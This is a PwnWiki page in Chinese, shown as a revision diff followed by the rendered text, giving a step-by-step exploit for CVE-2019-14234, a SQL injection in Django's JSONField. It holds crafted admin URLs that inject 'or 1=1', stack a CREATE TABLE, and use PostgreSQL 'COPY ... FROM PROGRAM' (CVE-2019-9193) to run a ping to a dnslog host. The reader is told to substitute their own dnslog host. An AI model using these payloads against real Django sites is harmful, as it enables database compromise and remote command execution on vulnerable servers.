Difference between revisions of "CVE-2019-14234 Django JSONField SQL注入漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Django 2.2.x < 2.2.4 Django 2.1.x < 2.1.11 Django 1.11.x < 1.11.23 </pre> <translate> ==漏洞利用== </tr...")
 
(Marked this version for translation)
 
Line 2: Line 2:
  
 
<translate>
 
<translate>
==影響版本==
+
==影響版本== <!--T:1-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>
Line 13: Line 13:
  
 
<translate>
 
<translate>
==漏洞利用==
+
==漏洞利用== <!--T:2-->
 
</translate>
 
</translate>
  
 
<translate>
 
<translate>
 +
<!--T:3-->
 
首先需登錄管理員後臺,訪問模型Collection的管理頁面:
 
首先需登錄管理員後臺,訪問模型Collection的管理頁面:
 
</translate>
 
</translate>
Line 32: Line 33:
  
 
<translate>
 
<translate>
 +
<!--T:4-->
 
Django一般與PostgreSQL一起配合使用,可以嘗試利用PostgreSQL 高權限命令執行漏洞[https://www.pwnwiki.org/index.php?title=CVE-2019-9193_PostgreSQL_%E9%AB%98%E6%AC%8A%E9%99%90%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E (CVE-2019-9193)]
 
Django一般與PostgreSQL一起配合使用,可以嘗試利用PostgreSQL 高權限命令執行漏洞[https://www.pwnwiki.org/index.php?title=CVE-2019-9193_PostgreSQL_%E9%AB%98%E6%AC%8A%E9%99%90%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E (CVE-2019-9193)]
 
</translate>
 
</translate>
Line 37: Line 39:
  
 
<translate>
 
<translate>
 +
<!--T:5-->
 
訪問以下URL:
 
訪問以下URL:
 
</translate>
 
</translate>
Line 44: Line 47:
  
 
<translate>
 
<translate>
 +
<!--T:6-->
 
回顯<code>no results to fetch</code> 語句成功執行。
 
回顯<code>no results to fetch</code> 語句成功執行。
 
</translate>
 
</translate>
  
 
<translate>
 
<translate>
 +
<!--T:7-->
 
訪問:
 
訪問:
 
</translate>
 
</translate>
Line 55: Line 60:
  
 
<translate>
 
<translate>
 +
<!--T:8-->
 
命令成功執行。
 
命令成功執行。
 
</translate>
 
</translate>
Line 60: Line 66:
 
===⚠️️===
 
===⚠️️===
 
<translate>
 
<translate>
 +
<!--T:9-->
 
<code>test.dnslog.cn</code>請修改爲自己的Dnslog
 
<code>test.dnslog.cn</code>請修改爲自己的Dnslog
 
</translate>
 
</translate>

Latest revision as of 19:48, 7 April 2021

Other languages:
Chinese • ‎español • ‎русский • ‎中文(中国大陆)‎

影響版本

Django 2.2.x < 2.2.4

Django 2.1.x < 2.1.11

Django 1.11.x < 1.11.23

漏洞利用

首先需登錄管理員後臺,訪問模型Collection的管理頁面:

http://127.0.0.1/admin/vuln/collection/
http://127.0.0.1/admin/vuln/collection/?detail__a%27
http://127.0.0.1/admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20--

Django一般與PostgreSQL一起配合使用,可以嘗試利用PostgreSQL 高權限命令執行漏洞(CVE-2019-9193)


訪問以下URL:

http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20

回顯no results to fetch 語句成功執行。

訪問:

http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20

命令成功執行。

⚠️️

test.dnslog.cn請修改爲自己的Dnslog